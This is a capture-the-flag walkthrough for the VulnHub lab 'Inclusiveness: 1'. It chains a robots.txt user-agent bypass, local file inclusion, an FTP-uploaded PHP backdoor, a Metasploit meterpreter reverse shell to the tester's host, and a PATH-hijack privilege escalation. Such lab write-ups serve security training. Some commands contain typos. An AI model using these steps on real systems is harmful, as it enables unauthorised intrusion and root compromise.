Another walkthrough for the vulnhub machine “INCLUSIVENESS: 1” which is an Intermediate level lab designed by the author “h4sh5 & Richard Lee” to give a taste to the OSCP Labs. The challenge is same just like any other CTF challenge where you identify the flag with the help of your pentest skill.

Download it from here: https://www.vulnhub.com/entry/inclusiveness-1,422/

Penetration Testing Methodologies

Network Scanning

• Netdiscover
• nmap

Enumeration

• txt
• User-agent restriction bypass
• LFI

Exploiting LFI

• LFI To RCE

Privilege Escalation

• Abusing PATH Variable

Walkthrough

Network Scanning

So, as we always start with netdiscover to get the IP of the VM machine and the IP of the host I’ve found is 192.168.29.151.

Let’s proceed with network scan using Nmap aggressive scan as given below.

nmap -p- -A 192168.29.151

And as a result, we find that port 21 is open for FTP where anonymous login has been allowed and the directory name as /pub is writeable, and port 80 and 22 are also accessible for HTTP and SSH respectively.

Enumeration

To find any loopholes we need to list more, so we’re browsing the host IP in the web browser, but unfortunately, they were found only the “Apache2 Debian Default page.”

Instead we try to check for the robots.txt file and, as a result, the message “You are not a search engine!” is shown. You can’t read my robots.txt!

Without wasting time, I try to bypass this restriction by editing a new user agent in my firefox using the following steps:

• Inside the URL tab search for “about:config”
• Then search for preference Name: useragnet
• Make a right click then > New > String

You get a dialog box; enter the preference name “general.useragent.overriide” as shown in the below image.

Enter the string value to provide useragent “GoogleBot”.

Once the above steps have been completed, the record will be shown for your new edit preference.

Now reload the URL for /robots.txt page and you will be able to read the disallowed entry as “/secret_informtion/” as shown below.

So, we’ve explored /secret_information, it brings a web page that describes “DNS Zone Transfer Attack” and the web page contains two hyperlinks “English & Spanish.”

As I click on the “English” hyperlink, I found that it was calling the en.php via lang parameter in the URL, which means that there could be possibilities for LFI.

Therefore, I try to get /etc/passwd file by abusing the php include of the webpage and as result I got the whole contents of the /etc/passwd file as shown in the below image.

Exploiting LFI

So, it was time to exploit the vulnerability of the LFI by injecting a malicious file and, as you know, the FTP service is available as anonymous and / pub is a writable directory.

We then try to read the “vsftpd.conf” FTP config file by abusing LFI to enumerate the writeable directory path.

We’ve prepared a php file that contains a malicious code that will further trigger remote command execution vulnerabilities.

Now it’s time to upload the malicious file “backdoor.php” on the host machine via ftp, thus follow the below commands

ftp 192.168.29.151
cd /pub
put backdoor.php

Further, we need to run the uploaded file to execute the malicious code by executing the following:

http://192.168.29.151/secret_information/?/lang=var/ftp/pub/backdoor.php&cmd=id

Using the URL above, try to run the backdoor.php file and simultaneously run the OS command “Id” as shown in the image provided here.

As we have been successful in inducing RCE in the installed application by abusing LFI, we are continuing with Metasploit’s “web delivery” Module to compromise the host machine in order to obtain a reverse connection.

use/exploit/multi/script/web_delivery
set target 1 <php>
set lhost 192.168.29.208
set payload php/meterpreter/reverse_tcp
exploit

This will generate a malicious PHP code which you’ll use for execution on the web URL as done above.

So, I copied the above malicious code and paste it inside the URL to get the back connection of the host through the URL execution.

Privilege Escalation

Booom!!! We hit the goal and obtain the meterperter session the host machine, since it was boot to root CTF, we need to escalate the root privilege shell, therefore we try to identify all programs or files that have SUID bits enabled.

So, with the help of find command, we’ve got a list of programs running as a superuser that unlocks the SUID bit where I notice /home/tom/rootshell.

Inside /root/tom/ I found rootshell.c file and a compile file rootshell that owns SUID permissions.

According this piece of code if the file is executed as Tom user by calling the function for “whoami” program for validation then you will get a privilege shell else it will print user-ID that is currently logged in will be displayed.

In simple words the rootshell program give a high privilege shell if the output of whoami program will be “tom”.

You can easily take advantage of this configuration by abusing the PATH system. Here, we built a file as “whoami” in the / tmp directory, and write the following bash code to print “tom”

cd /tmp
echo "printf "tom"" > whoami
chmod 777 whoami

Add a temporary path variable with the help of the following command. you will observe that we had added /tmp as PATH variable.

export PATH=/tmp:$PATH
echo path

when all is done then the rootshell to get the root privilege shell just we have obtained here as to shown below.

cd /home/tom
./rootshell
cd /root
cat flag.txt

Finally, we have found the root shell a flag.txt file, this lab has a good combination of basic vulnerability of Web and OS privilege Escalation.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn